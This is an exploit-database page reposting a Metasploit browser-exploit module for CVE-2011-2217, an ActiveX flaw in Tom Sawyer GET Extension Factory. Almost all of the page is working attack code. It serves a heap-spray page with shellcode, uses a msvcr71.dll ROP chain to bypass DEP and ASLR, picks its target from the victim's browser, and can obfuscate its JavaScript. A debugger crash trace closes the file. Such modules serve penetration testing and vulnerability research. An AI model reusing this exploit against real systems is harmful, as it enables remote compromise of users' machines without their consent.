Tom Sawyer Software GET Extension Factory Remote Code Execution



EKU-ID: 2278 CVE: 2011-2217 OSVDB-ID: 73211
Author: rgod Published: 2012-06-11 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::Remote::HttpServer::HTML
 include Msf::Exploit::Remote::BrowserAutopwn

 autopwn_info({
  :os_name    => OperatingSystems::WINDOWS,
  :ua_name    => HttpClients::IE,
  :ua_minver  => "6.0",
  :ua_maxver  => "8.0",
  :javascript => true,
  :rank       => NormalRanking,
  :classid    => "{658ED6E7-0DA1-4ADD-B2FB-095F08091118}"
 })

 def initialize(info={})
  super(update_info(info,
   'Name'           => "Tom Sawyer Software GET Extension Factory Remote Code Execution",
   'Description'    => %q{
     This module exploits a remote code execution vulnerability in the tsgetx71ex553.dll
    ActiveX control installed with Tom Sawyer GET Extension Factory due to an incorrect
    initialization under Internet Explorer.

    While the Tom Sawyer GET Extension Factory is installed with some versions of  VMware
    Infrastructure Client, this module has been tested only with the versions installed
    with Embarcadero Technologies ER/Studio XE2 / Embarcadero Studio Portal 1.6. The ActiveX
    control tested is tsgetx71ex553.dll, version 5.5.3.238.

    This module achieves DEP and ASLR bypass using the well known msvcr71.dll rop chain. The
    dll is installed by default with the Embarcadero software, and loaded by the targeted
    ActiveX.
   },
   'License'        => MSF_LICENSE,
   'Author'         =>
    [
     'Elazar Broad', # Vulnerability discovery
     'rgod', # PoC
     'juan vazquez' # Metasploit module
    ],
   'References'     =>
    [
     [ 'CVE', '2011-2217' ],
     [ 'OSVDB', '73211' ],
     [ 'BID', '48099' ],
     [ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=911' ]
    ],
   'Payload'        =>
    {
     'Space'           => 1024,
     'BadChars'        => "\x00",
     'DisableNops'     => true
    },
   'DefaultOptions'  =>
    {
     'ExitFunction'         => "process",
     'InitialAutoRunScript' => 'migrate -f'
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     # Embarcadero Technologies ER/Studio XE2
     # tsgetx71ex553.dll 5.5.3.238
     [ 'Automatic', {} ],
     [ 'IE 6 on Windows XP SP3',
      {
       'Rop'    => nil,
       'Offset' => '0x00'
      }
     ],
     [ 'IE 7 on Windows XP SP3',
      {
       'Rop'    => nil,
       'Offset' => '0x800 - code.length'
      }
     ],
     [ 'IE 8 on Windows XP SP3',
      {
       'Rop'    => true,
       'Offset' => '0x0',
       'RopChainOffset' => '0x73e'
      }
     ],
     [ 'IE 8 on Windows 7 SP1',
      {
       'Rop'    => true,
       'Offset' => '0x0',
       'RopChainOffset' => '0x73e'
      }
     ]
    ],
   'Privileged'     => false,
   'DisclosureDate' => "May 03 2011",
   'DefaultTarget'  => 0))

  register_options(
   [
    OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
   ], self.class)
 end

 def get_target(agent)
  #If the user is already specified by the user, we'll just use that
  return target if target.name != 'Automatic'

  if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
   return targets[1]  #IE 6 on Windows XP SP3
  elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
   return targets[2]  #IE 7 on Windows XP SP3
  elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
   return targets[3]  #IE 8 on Windows XP SP3
  elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
   return targets[4]  #IE 8 on Windows 7 SP1
  else
   return nil
  end
 end

 def junk(n=4)
  return rand_text_alpha(n).unpack("V").first
 end

 def nop
  return make_nops(4).unpack("V").first
 end

 def get_rop_chain(t)

  adjust =
  [
   junk,  # heap sprayed to 342d1ea0
   0x7c1ce310,  # stackpivot # push ecx # pop esp # pop edi # pop esi # retn 18 # mfc71.DLL
   0x7c347f98,  # RETN (ROP NOP) # msvcr71.dll
   junk,
   junk,
   junk,
   junk,
   junk,
   junk
  ].pack("V*")

  # chain generated by mona.py - See corelan.be
  rop =
  [
   0x7c37653d,  # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
   0xfffffdff,  # Value to negate, will become 0x00000201 (dwSize)
   0x7c347f98,  # RETN (ROP NOP)
   0x7c3415a2,  # JMP [EAX]
   0xffffffff,
   0x7c376402,  # skip 4 bytes
   0x7c351e05,  # NEG EAX # RETN
   0x7c345255,  # INC EBX # FPATAN # RETN
   0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
   0x7c344f87,  # POP EDX # RETN
   0xffffffc0,  # Value to negate, will become 0x00000040
   0x7c351eb1,  # NEG EDX # RETN
   0x7c34d201,  # POP ECX # RETN
   0x7c38b001,  # &Writable location
   0x7c347f97,  # POP EAX # RETN
   0x7c37a151,  # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
   0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN
   0x7c345c30,  # ptr to 'push esp #  ret '
  ].pack("V*")

  code = adjust
  code << rop

  return code
 end


 def on_request_uri(cli, request)
  agent = request.headers['User-Agent']
  my_target = get_target(agent)

  # Avoid the attack if the victim doesn't have the same setup we're targeting
  if my_target.nil?
   print_error("Browser not supported: #{agent.to_s}")
   send_not_found(cli)
   return
  end

  print_status("Target set: #{my_target.name}")

  p = payload.encoded
  js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
  js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
  js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))

  if my_target['Rop'].nil?
   js_shellcode = "var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);"
  else
   js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))
   js_shellcode = <<-JS_ROP
   var rop_chain = unescape("#{js_rop}");
   var nops_padding = nops.substring(0, 0x73e-code.length-offset.length);
   var shellcode = code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length);
   JS_ROP
   js_shellcode = js_shellcode.gsub(/^\t\t\t/, '')
  end

  js = <<-JS
  var heap_obj = new heapLib.ie(0x20000);
  var code = unescape("#{js_code}");
  var nops = unescape("#{js_nops}");
  var nops_90 = unescape("#{js_90_nops}");

  while (nops.length < 0x80000) nops += nops;
  while (nops_90.length < 0x80000) nops_90 += nops_90;

  var offset = nops.substring(0, #{my_target['Offset']});
  #{js_shellcode}

  while (shellcode.length < 0x40000) shellcode += shellcode;
  var block = shellcode.substring(0, (0x80000-6)/2);


  heap_obj.gc();
  for (var z=1; z < 0x685; z++) {
   heap_obj.alloc(block);
  }

  JS

  js = heaplib(js, {:noobfu => true})

  #obfuscate on demand
  if datastore['OBFUSCATE']
   js = ::Rex::Exploitation::JSObfu.new(js)
   js.obfuscate
  end

  html = <<-EOS
  <html>
  <head>
  <script>
  #{js}
  </script>
  </head>
  <body>
  <object classid="clsid:658ED6E7-0DA1-4ADD-B2FB-095F08091118">
  </object>
  </body>
  </html>
  EOS

  html = html.gsub(/^\t\t/, '')

  print_status("Sending html")
  send_response(cli, html, {'Content-Type'=>'text/html'})

 end

end

=begin
(b44.b48): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0013e27c ecx=342d1ea0 edx=00000000 esi=75c63d38 edi=80004002
eip=28d2954d esp=0013e230 ebp=0013e2d4 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
tsgetx71ex553!Ordinal931+0x2dd:
28d2954d ff5104          call    dword ptr [ecx+4]    ds:0023:342d1ea4=????????
=end